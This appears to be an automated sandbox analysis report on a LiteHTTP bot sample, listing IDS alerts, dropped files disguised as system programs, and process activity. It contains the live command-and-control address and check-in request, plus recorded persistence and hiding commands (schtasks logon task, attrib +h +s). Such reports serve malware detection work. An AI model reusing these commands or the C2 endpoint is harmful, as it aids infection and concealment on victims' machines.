                            Source: Network traffic Suricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.7:49977 -> 87.120.126.5:80
                            Source: Network traffic Suricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.7:49996 -> 87.120.126.5:80
                            Source: Network traffic Suricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.7:49996 -> 87.120.126.5:80
                            Source: Network traffic Suricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.7:49997 -> 87.120.126.5:80
                            Source: Network traffic Suricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.7:49993 -> 87.120.126.5:80
                            Source: Network traffic Suricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.7:49977 -> 87.120.126.5:80
                            Source: Network traffic Suricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.7:49977 -> 87.120.126.5:80
                            Source: Network traffic Suricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.7:49993 -> 87.120.126.5:80
                            Source: Network traffic Suricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.7:49999 -> 87.120.126.5:80
                            Source: Network traffic Suricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.7:49999 -> 87.120.126.5:80
                            Source: Network traffic Suricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.7:49983 -> 87.120.126.5:80
                            Source: Network traffic Suricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.7:49983 -> 87.120.126.5:80
                            Source: Network traffic Suricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.7:49983 -> 87.120.126.5:80
                            Source: Network traffic Suricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.7:49995 -> 87.120.126.5:80
                            Source: Network traffic Suricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.7:49997 -> 87.120.126.5:80
                            Source: Network traffic Suricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.7:49997 -> 87.120.126.5:80
                            Source: Network traffic Suricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.7:49995 -> 87.120.126.5:80
                            Source: Network traffic Suricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.7:49995 -> 87.120.126.5:80
                            Source: Yara match File source: 3u8A2xjbBT.exe, type: SAMPLE
                            Source: Yara match File source: C:\Users\user\OneDrive\microsoft.net.exe, type: DROPPED
                            Source: Yara match File source: C:\Users\user\OneDrive\windows nt.exe, type: DROPPED
                            Source: Yara match File source: C:\Users\user\OneDrive\java.exe, type: DROPPED
                            Source: Yara match File source: C:\Users\user\OneDrive\windowspowershell.exe, type: DROPPED
                            Source: Yara match File source: C:\Users\user\OneDrive\google.exe, type: DROPPED
                            Source: Yara match File source: C:\Users\user\OneDrive\windows portable devices.exe, type: DROPPED
                            Source: Yara match File source: C:\Users\user\OneDrive\windows media player.exe, type: DROPPED
                            Source: Yara match File source: C:\Users\user\OneDrive\mozilla maintenance service.exe, type: DROPPED
                            Source: Yara match File source: C:\Users\user\OneDrive\autoit3.exe, type: DROPPED
                            Source: Yara match File source: C:\Users\user\OneDrive\windows defender.exe, type: DROPPED
                            Source: Yara match File source: C:\Users\user\OneDrive\windows mail.exe, type: DROPPED
                            Source: Yara match File source: C:\Users\user\OneDrive\windows sidebar.exe, type: DROPPED
                            Source: Yara match File source: C:\Users\user\OneDrive\windows photo viewer.exe, type: DROPPED
                            Source: Yara match File source: C:\Users\user\OneDrive\microsoft.exe, type: DROPPED
                            Source: Yara match File source: C:\Users\user\OneDrive\windows multimedia platform.exe, type: DROPPED
                            Source: Yara match File source: C:\Users\user\OneDrive\internet explorer.exe, type: DROPPED
                            Source: Yara match File source: C:\Users\user\OneDrive\common files.exe, type: DROPPED
                            Source: Yara match File source: C:\Users\user\OneDrive\jdownloader.exe, type: DROPPED
                            Source: Yara match File source: C:\Users\user\OneDrive\reference assemblies.exe, type: DROPPED
                            Source: Yara match File source: C:\Users\user\OneDrive\msecache.exe, type: DROPPED
                            Source: Yara match File source: C:\Users\user\OneDrive\uyihfjjsbovlcbxlcojsmqtzznevrdoctnxfvfrajmemtqlbiqoohtfay.exe, type: DROPPED
                            Source: Yara match File source: C:\Users\user\OneDrive\microsoft office.exe, type: DROPPED
                            Source: Yara match File source: C:\Users\user\OneDrive\msbuild.exe, type: DROPPED
                            Source: Joe Sandbox View ASN Name: UNACS-AS-BG8000BurgasBG UNACS-AS-BG8000BurgasBG
                            Source: unknown TCP traffic detected without corresponding DNS query: 87.120.126.5
                            Source: unknown HTTP traffic detected: POST /VmCetSC7/page.php HTTP/1.1 User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3 Content-Type: application/x-www-form-urlencoded Host: 87.120.126.5 Content-Length: 471 Expect: 100-continue Connection: Keep-Alive
                            Source: 3u8A2xjbBT.exe, 00000000.00000002.3711597312.0000000003638000.00000004.00000800.00020000.00000000.sdmp, 3u8A2xjbBT.exe, 00000000.00000002.3711597312.0000000003524000.00000004.00000800.00020000.00000000.sdmp, 3u8A2xjbBT.exe, 00000000.00000002.3711597312.00000000034DB000.00000004.00000800.00020000.00000000.sdmp, 3u8A2xjbBT.exe, 00000000.00000002.3711597312.0000000003660000.00000004.00000800.00020000.00000000.sdmp, 3u8A2xjbBT.exe, 00000000.00000002.3711597312.0000000003554000.00000004.00000800.00020000.00000000.sdmp, 3u8A2xjbBT.exe, 00000000.00000002.3711597312.0000000003688000.00000004.00000800.00020000.00000000.sdmp, 3u8A2xjbBT.exe, 0000000F.00000002.3711404452.0000000002CF7000.00000004.00000800.00020000.00000000.sdmp, 3u8A2xjbBT.exe, 0000000F.00000002.3711404452.0000000002D22000.00000004.00000800.00020000.00000000.sdmp, 3u8A2xjbBT.exe, 0000000F.00000002.3711404452.0000000002D72000.00000004.00000800.00020000.00000000.sdmp, 3u8A2xjbBT.exe, 00000010.00000002.3711218629.0000000003120000.00000004.00000800.00020000.00000000.sdmp, 3u8A2xjbBT.exe, 00000010.00000002.3711218629.000000000316D000.00000004.00000800.00020000.00000000.sdmp, 3u8A2xjbBT.exe, 00000010.00000002.3711218629.0000000003132000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://87.120.126.5
                            Source: 3u8A2xjbBT.exe, 00000000.00000002.3711597312.00000000033E6000.00000004.00000800.00020000.00000000.sdmp, 3u8A2xjbBT.exe, 0000000F.00000002.3711404452.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, 3u8A2xjbBT.exe, 00000010.00000002.3711218629.0000000003037000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://87.120.126.5/VmCetSC7/page.php
                            Source: 3u8A2xjbBT.exe, 00000000.00000002.3711597312.0000000003638000.00000004.00000800.00020000.00000000.sdmp, 3u8A2xjbBT.exe, 00000000.00000002.3711597312.0000000003524000.00000004.00000800.00020000.00000000.sdmp, 3u8A2xjbBT.exe, 00000000.00000002.3711597312.0000000003660000.00000004.00000800.00020000.00000000.sdmp, 3u8A2xjbBT.exe, 00000000.00000002.3711597312.000000000347E000.00000004.00000800.00020000.00000000.sdmp, 3u8A2xjbBT.exe, 00000000.00000002.3711597312.0000000003554000.00000004.00000800.00020000.00000000.sdmp, 3u8A2xjbBT.exe, 00000000.00000002.3711597312.0000000003688000.00000004.00000800.00020000.00000000.sdmp, 3u8A2xjbBT.exe, 0000000F.00000002.3711404452.0000000002D22000.00000004.00000800.00020000.00000000.sdmp, 3u8A2xjbBT.exe, 0000000F.00000002.3711404452.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, 3u8A2xjbBT.exe, 0000000F.00000002.3711404452.0000000002D72000.00000004.00000800.00020000.00000000.sdmp, 3u8A2xjbBT.exe, 00000010.00000002.3711218629.000000000316D000.00000004.00000800.00020000.00000000.sdmp, 3u8A2xjbBT.exe, 00000010.00000002.3711218629.0000000003089000.00000004.00000800.00020000.00000000.sdmp, 3u8A2xjbBT.exe, 00000010.00000002.3711218629.0000000003132000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://87.120.126.5/VmCetSC7/page.phpP
                            Source: 3u8A2xjbBT.exe, 0000000F.00000002.3716378962.000000000A222000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://87.120.126.5/VmCetSC7/page.phpy
                            Source: 3u8A2xjbBT.exe, msbuild.exe.0.dr, mozilla maintenance service.exe.0.dr, windows photo viewer.exe.0.dr, uyihfjjsbovlcbxlcojsmqtzznevrdoctnxfvfrajmemtqlbiqoohtfay.exe.0.dr, windowspowershell.exe.0.dr, windows media player.exe.0.dr, jdownloader.exe.0.dr, windows portable devices.exe.0.dr, msecache.exe.0.dr, google.exe.0.dr, windows mail.exe.0.dr, common files.exe.0.dr, java.exe.0.dr, windows defender.exe.0.dr, windows sidebar.exe.0.dr, microsoft.net.exe.0.dr, windows multimedia platform.exe.0.dr, windows nt.exe.0.dr, microsoft.exe.0.dr, reference assemblies.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                            Source: 3u8A2xjbBT.exe, msbuild.exe.0.dr, mozilla maintenance service.exe.0.dr, windows photo viewer.exe.0.dr, uyihfjjsbovlcbxlcojsmqtzznevrdoctnxfvfrajmemtqlbiqoohtfay.exe.0.dr, windowspowershell.exe.0.dr, windows media player.exe.0.dr, jdownloader.exe.0.dr, windows portable devices.exe.0.dr, msecache.exe.0.dr, google.exe.0.dr, windows mail.exe.0.dr, common files.exe.0.dr, java.exe.0.dr, windows defender.exe.0.dr, windows sidebar.exe.0.dr, microsoft.net.exe.0.dr, windows multimedia platform.exe.0.dr, windows nt.exe.0.dr, microsoft.exe.0.dr, reference assemblies.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                            Source: 3u8A2xjbBT.exe, msbuild.exe.0.dr, mozilla maintenance service.exe.0.dr, windows photo viewer.exe.0.dr, uyihfjjsbovlcbxlcojsmqtzznevrdoctnxfvfrajmemtqlbiqoohtfay.exe.0.dr, windowspowershell.exe.0.dr, windows media player.exe.0.dr, jdownloader.exe.0.dr, windows portable devices.exe.0.dr, msecache.exe.0.dr, google.exe.0.dr, windows mail.exe.0.dr, common files.exe.0.dr, java.exe.0.dr, windows defender.exe.0.dr, windows sidebar.exe.0.dr, microsoft.net.exe.0.dr, windows multimedia platform.exe.0.dr, windows nt.exe.0.dr, microsoft.exe.0.dr, reference assemblies.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                            Source: 3u8A2xjbBT.exe, msbuild.exe.0.dr, mozilla maintenance service.exe.0.dr, windows photo viewer.exe.0.dr, uyihfjjsbovlcbxlcojsmqtzznevrdoctnxfvfrajmemtqlbiqoohtfay.exe.0.dr, windowspowershell.exe.0.dr, windows media player.exe.0.dr, jdownloader.exe.0.dr, windows portable devices.exe.0.dr, msecache.exe.0.dr, google.exe.0.dr, windows mail.exe.0.dr, common files.exe.0.dr, java.exe.0.dr, windows defender.exe.0.dr, windows sidebar.exe.0.dr, microsoft.net.exe.0.dr, windows multimedia platform.exe.0.dr, windows nt.exe.0.dr, microsoft.exe.0.dr, reference assemblies.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                            Source: 3u8A2xjbBT.exe, msbuild.exe.0.dr, mozilla maintenance service.exe.0.dr, windows photo viewer.exe.0.dr, uyihfjjsbovlcbxlcojsmqtzznevrdoctnxfvfrajmemtqlbiqoohtfay.exe.0.dr, windowspowershell.exe.0.dr, windows media player.exe.0.dr, jdownloader.exe.0.dr, windows portable devices.exe.0.dr, msecache.exe.0.dr, google.exe.0.dr, windows mail.exe.0.dr, common files.exe.0.dr, java.exe.0.dr, windows defender.exe.0.dr, windows sidebar.exe.0.dr, microsoft.net.exe.0.dr, windows multimedia platform.exe.0.dr, windows nt.exe.0.dr, microsoft.exe.0.dr, reference assemblies.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                            Source: 3u8A2xjbBT.exe, msbuild.exe.0.dr, mozilla maintenance service.exe.0.dr, windows photo viewer.exe.0.dr, uyihfjjsbovlcbxlcojsmqtzznevrdoctnxfvfrajmemtqlbiqoohtfay.exe.0.dr, windowspowershell.exe.0.dr, windows media player.exe.0.dr, jdownloader.exe.0.dr, windows portable devices.exe.0.dr, msecache.exe.0.dr, google.exe.0.dr, windows mail.exe.0.dr, common files.exe.0.dr, java.exe.0.dr, windows defender.exe.0.dr, windows sidebar.exe.0.dr, microsoft.net.exe.0.dr, windows multimedia platform.exe.0.dr, windows nt.exe.0.dr, microsoft.exe.0.dr, reference assemblies.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                            Source: 3u8A2xjbBT.exe, msbuild.exe.0.dr, mozilla maintenance service.exe.0.dr, windows photo viewer.exe.0.dr, uyihfjjsbovlcbxlcojsmqtzznevrdoctnxfvfrajmemtqlbiqoohtfay.exe.0.dr, windowspowershell.exe.0.dr, windows media player.exe.0.dr, jdownloader.exe.0.dr, windows portable devices.exe.0.dr, msecache.exe.0.dr, google.exe.0.dr, windows mail.exe.0.dr, common files.exe.0.dr, java.exe.0.dr, windows defender.exe.0.dr, windows sidebar.exe.0.dr, microsoft.net.exe.0.dr, windows multimedia platform.exe.0.dr, windows nt.exe.0.dr, microsoft.exe.0.dr, reference assemblies.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                            Source: autoit3.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                            Source: 3u8A2xjbBT.exe, msbuild.exe.0.dr, mozilla maintenance service.exe.0.dr, windows photo viewer.exe.0.dr, uyihfjjsbovlcbxlcojsmqtzznevrdoctnxfvfrajmemtqlbiqoohtfay.exe.0.dr, windowspowershell.exe.0.dr, windows media player.exe.0.dr, jdownloader.exe.0.dr, windows portable devices.exe.0.dr, msecache.exe.0.dr, google.exe.0.dr, windows mail.exe.0.dr, common files.exe.0.dr, java.exe.0.dr, windows defender.exe.0.dr, windows sidebar.exe.0.dr, microsoft.net.exe.0.dr, windows multimedia platform.exe.0.dr, windows nt.exe.0.dr, microsoft.exe.0.dr, reference assemblies.exe.0.dr String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                            Source: 3u8A2xjbBT.exe, msbuild.exe.0.dr, mozilla maintenance service.exe.0.dr, windows photo viewer.exe.0.dr, uyihfjjsbovlcbxlcojsmqtzznevrdoctnxfvfrajmemtqlbiqoohtfay.exe.0.dr, windowspowershell.exe.0.dr, windows media player.exe.0.dr, jdownloader.exe.0.dr, windows portable devices.exe.0.dr, msecache.exe.0.dr, google.exe.0.dr, windows mail.exe.0.dr, common files.exe.0.dr, java.exe.0.dr, windows defender.exe.0.dr, windows sidebar.exe.0.dr, microsoft.net.exe.0.dr, windows multimedia platform.exe.0.dr, windows nt.exe.0.dr, microsoft.exe.0.dr, reference assemblies.exe.0.dr String found in binary or memory: http://ocsp.digicert.com0
                            Source: 3u8A2xjbBT.exe, msbuild.exe.0.dr, mozilla maintenance service.exe.0.dr, windows photo viewer.exe.0.dr, uyihfjjsbovlcbxlcojsmqtzznevrdoctnxfvfrajmemtqlbiqoohtfay.exe.0.dr, windowspowershell.exe.0.dr, windows media player.exe.0.dr, jdownloader.exe.0.dr, windows portable devices.exe.0.dr, msecache.exe.0.dr, google.exe.0.dr, windows mail.exe.0.dr, common files.exe.0.dr, java.exe.0.dr, windows defender.exe.0.dr, windows sidebar.exe.0.dr, microsoft.net.exe.0.dr, windows multimedia platform.exe.0.dr, windows nt.exe.0.dr, microsoft.exe.0.dr, reference assemblies.exe.0.dr String found in binary or memory: http://ocsp.digicert.com0A
                            Source: 3u8A2xjbBT.exe, msbuild.exe.0.dr, mozilla maintenance service.exe.0.dr, windows photo viewer.exe.0.dr, uyihfjjsbovlcbxlcojsmqtzznevrdoctnxfvfrajmemtqlbiqoohtfay.exe.0.dr, windowspowershell.exe.0.dr, windows media player.exe.0.dr, jdownloader.exe.0.dr, windows portable devices.exe.0.dr, msecache.exe.0.dr, google.exe.0.dr, windows mail.exe.0.dr, common files.exe.0.dr, java.exe.0.dr, windows defender.exe.0.dr, windows sidebar.exe.0.dr, microsoft.net.exe.0.dr, windows multimedia platform.exe.0.dr, windows nt.exe.0.dr, microsoft.exe.0.dr, reference assemblies.exe.0.dr String found in binary or memory: http://ocsp.digicert.com0C
                            Source: 3u8A2xjbBT.exe, msbuild.exe.0.dr, mozilla maintenance service.exe.0.dr, windows photo viewer.exe.0.dr, uyihfjjsbovlcbxlcojsmqtzznevrdoctnxfvfrajmemtqlbiqoohtfay.exe.0.dr, windowspowershell.exe.0.dr, windows media player.exe.0.dr, jdownloader.exe.0.dr, windows portable devices.exe.0.dr, msecache.exe.0.dr, google.exe.0.dr, windows mail.exe.0.dr, common files.exe.0.dr, java.exe.0.dr, windows defender.exe.0.dr, windows sidebar.exe.0.dr, microsoft.net.exe.0.dr, windows multimedia platform.exe.0.dr, windows nt.exe.0.dr, microsoft.exe.0.dr, reference assemblies.exe.0.dr String found in binary or memory: http://ocsp.digicert.com0X
                            Source: 3u8A2xjbBT.exe, 00000000.00000002.3711597312.000000000347E000.00000004.00000800.00020000.00000000.sdmp, 3u8A2xjbBT.exe, 0000000F.00000002.3711404452.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, 3u8A2xjbBT.exe, 00000010.00000002.3711218629.0000000003089000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                            Source: 3u8A2xjbBT.exe, msbuild.exe.0.dr, mozilla maintenance service.exe.0.dr, windows photo viewer.exe.0.dr, uyihfjjsbovlcbxlcojsmqtzznevrdoctnxfvfrajmemtqlbiqoohtfay.exe.0.dr, windowspowershell.exe.0.dr, windows media player.exe.0.dr, jdownloader.exe.0.dr, windows portable devices.exe.0.dr, msecache.exe.0.dr, google.exe.0.dr, windows mail.exe.0.dr, common files.exe.0.dr, java.exe.0.dr, windows defender.exe.0.dr, windows sidebar.exe.0.dr, microsoft.net.exe.0.dr, windows multimedia platform.exe.0.dr, windows nt.exe.0.dr, microsoft.exe.0.dr, reference assemblies.exe.0.dr String found in binary or memory: http://www.digicert.com/CPS0
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe Process Stats: CPU usage > 49%
                            Source: 3u8A2xjbBT.exeStatic PE information: invalid certificate
                            Source: 3u8A2xjbBT.exe, 00000000.00000000.1254425565.0000000000F82000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameAnubis.exe> vs 3u8A2xjbBT.exe
                            Source: 3u8A2xjbBT.exe, 00000000.00000002.3710064092.000000000167E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs 3u8A2xjbBT.exe
                            Source: 3u8A2xjbBT.exe, 00000000.00000002.3717623795.000000000C120000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAnubis.exe> vs 3u8A2xjbBT.exe
                            Source: 3u8A2xjbBT.exe, 0000000F.00000002.3716378962.000000000A2AB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAnubis.exe> vs 3u8A2xjbBT.exe
                            Source: 3u8A2xjbBT.exeBinary or memory string: OriginalFilenameAnubis.exe> vs 3u8A2xjbBT.exe
                            Source: 3u8A2xjbBT.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                            Source: 3u8A2xjbBT.exe, -----------------------------------------.csCryptographic APIs: 'CreateDecryptor'
                            Source: windows multimedia platform.exe.0.dr, -----------------------------------------.csCryptographic APIs: 'CreateDecryptor'
                            Source: windows nt.exe.0.dr, -----------------------------------------.csCryptographic APIs: 'CreateDecryptor'
                            Source: windows photo viewer.exe.0.dr, -----------------------------------------.csCryptographic APIs: 'CreateDecryptor'
                            Source: windows portable devices.exe.0.dr, -----------------------------------------.csCryptographic APIs: 'CreateDecryptor'
                            Source: windows sidebar.exe.0.dr, -----------------------------------------.csCryptographic APIs: 'CreateDecryptor'
                            Source: autoit3.exe.0.dr, -----------------------------------------.csCryptographic APIs: 'CreateDecryptor'
                            Source: windowspowershell.exe.0.dr, -----------------------------------------.csCryptographic APIs: 'CreateDecryptor'
                            Source: common files.exe.0.dr, -----------------------------------------.csCryptographic APIs: 'CreateDecryptor'
                            Source: google.exe.0.dr, -----------------------------------------.csCryptographic APIs: 'CreateDecryptor'
                            Source: windows nt.exe.0.dr, --c4X9AJE02-i---a--F--o8E.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                            Source: windows nt.exe.0.dr, --c4X9AJE02-i---a--F--o8E.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                            Source: common files.exe.0.dr, --c4X9AJE02-i---a--F--o8E.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                            Source: common files.exe.0.dr, --c4X9AJE02-i---a--F--o8E.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                            Source: windows multimedia platform.exe.0.dr, --c4X9AJE02-i---a--F--o8E.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                            Source: windows multimedia platform.exe.0.dr, --c4X9AJE02-i---a--F--o8E.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                            Source: windows portable devices.exe.0.dr, --c4X9AJE02-i---a--F--o8E.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                            Source: windows portable devices.exe.0.dr, --c4X9AJE02-i---a--F--o8E.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                            Source: windows sidebar.exe.0.dr, --c4X9AJE02-i---a--F--o8E.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                            Source: windows sidebar.exe.0.dr, --c4X9AJE02-i---a--F--o8E.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                            Source: windowspowershell.exe.0.dr, --c4X9AJE02-i---a--F--o8E.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                            Source: windowspowershell.exe.0.dr, --c4X9AJE02-i---a--F--o8E.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                            Source: 3u8A2xjbBT.exe, --c4X9AJE02-i---a--F--o8E.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                            Source: 3u8A2xjbBT.exe, --c4X9AJE02-i---a--F--o8E.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                            Source: autoit3.exe.0.dr, --c4X9AJE02-i---a--F--o8E.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                            Source: autoit3.exe.0.dr, --c4X9AJE02-i---a--F--o8E.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                            Source: windows photo viewer.exe.0.dr, --c4X9AJE02-i---a--F--o8E.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                            Source: windows photo viewer.exe.0.dr, --c4X9AJE02-i---a--F--o8E.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                            Source: google.exe.0.dr, --c4X9AJE02-i---a--F--o8E.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                            Source: google.exe.0.dr, --c4X9AJE02-i---a--F--o8E.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                            Source: classification engineClassification label: mal100.troj.evad.mine.winEXE@72/47@0/1
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\3u8A2xjbBT.lnkJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe | Mutant created: NULL
                            Source: 3u8A2xjbBT.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: 3u8A2xjbBT.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe | File read: C:\Users\user\Desktop\desktop.ini
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                            Source: 3u8A2xjbBT.exe | ReversingLabs: Detection: 67%
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe | File read: C:\Users\user\Desktop\3u8A2xjbBT.exe
                            Source: unknown | Process created: C:\Users\user\Desktop\3u8A2xjbBT.exe "C:\Users\user\Desktop\3u8A2xjbBT.exe"
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks" /Query /TN "3u8A2xjbBT"
                            Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /sc onlogon /tn "3u8A2xjbBT" /tr "C:\Users\user\Desktop\3u8A2xjbBT.exe"
                            Source: unknown | Process created: C:\Users\user\Desktop\3u8A2xjbBT.exe C:\Users\user\Desktop\3u8A2xjbBT.exe
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe | Process created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe"
                            Source: C:\Windows\SysWOW64\attrib.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exe | Process created: unknown unknown
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks" /Query /TN "3u8A2xjbBT"
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe"
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe"
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe"
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe"
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe"
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe"
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\3u8A2xjbBT.exe"
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: unknown unknown
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeProcess created: unknown unknown
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Users\user\Desktop\3u8A2xjbBT.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
